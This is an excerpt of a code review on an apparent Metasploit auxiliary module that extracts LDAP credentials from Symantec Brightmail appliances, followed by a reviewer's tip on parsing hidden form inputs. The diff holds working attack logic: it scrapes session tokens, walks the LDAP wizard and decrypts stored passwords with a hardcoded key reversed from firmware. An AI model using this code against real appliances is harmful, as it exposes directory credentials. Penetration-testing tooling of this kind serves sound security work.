modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb

```diff
@@ -0,0 +1,283 @@
+     return sid2  if res and res.body =~ /Logged in/
+   end
+   return false
+  end
+
+  def get_login_data
+    sid        = ''  #From cookie
+    last_login = ''  #A hidden field in the login page
+    res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'})
+    if res and !res.get_cookies.empty?
+      sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
+    end
+    if res
+      last_login = res.body.scan(/<input type="hidden" name="lastlogin" value="(.+)"\/>/).flatten[0] || ''
+    end
+    return sid, last_login
+  end
+
+  # Returns the status of the listening port.
+  #
+  # @return [Boolean] TrueClass if port open, otherwise FalseClass.
+
+  def port_open?
+    begin
+      res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
+      return true if res
+    rescue ::Rex::ConnectionRefused
+      print_status("#{peer} - Connection refused")
+      return false
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} - Connection failed")
+      return false
+    rescue ::OpenSSL::SSL::SSLError
+      print_error("#{peer} - SSL/TLS connection error")
+      return false
+    end
+  end
+
+  # Returns the derived key from the password, the salt and the iteration count number.
+  #
+  # @return Array of byte containing the derived key.
+  def get_derived_key(password, salt, count)
+    key = password + salt
+    for i in 0..count-1
+        key = Digest::MD5.digest(key)
+    end
+    kl = key.length
+    return key[0,8], key[8,kl]
+  end
+
+
+  # @Return the deciphered password
+  # Algorithm obtained by reversing the firmware
+  #
+  def decrypt(enc_str)
+    pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
+    salt = (Base64.strict_decode64(enc_str[0,12]))
+    remsg = (Base64.strict_decode64(enc_str[12,enc_str.length]))
+    (dk, iv) = get_derived_key(pbe_key, salt, 1000)
+    alg = "des-cbc"
+    decode_cipher = OpenSSL::Cipher::Cipher.new(alg)
+    decode_cipher.decrypt
+    decode_cipher.padding = 0
+    decode_cipher.key = dk
+    decode_cipher.iv = iv
+    plain = decode_cipher.update(remsg)
+    plain << decode_cipher.final
+    return  plain.gsub(/[\x01-\x08]/,'')
+  end
+
+ def grab_auths(sid,last_login)
+  token = '' #from hidden input
+  selected_ldap = '' # from checkbox input
+  new_uri = '' # redirection
+  flow_id = '' # id of the flow
+  folder = '' # symantec folder
+  res = send_request_cgi({
+   'method'    => 'GET',
+   'uri'       => "/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+   'headers'   => {
+    'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+    'Connection' => 'keep-alive'
+   },
+   'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid};"
+   })
+   if res
+    token = res.body.scan(/<input type="hidden" name="symantec.brightmail.key.TOKEN" value="(.+)"\/>/).flatten[0] || ''
```

Comment:
This I'm sure works fine, but in case you didn't know, there is ```res.get_hidden_inputs``` that allows you to get a hidden input. For example:

```ruby
inputs = res.get_hidden_inputs[0] # Get all inputs from the first form
token = inputs['symantec.brightmail.key.TOKEN']
```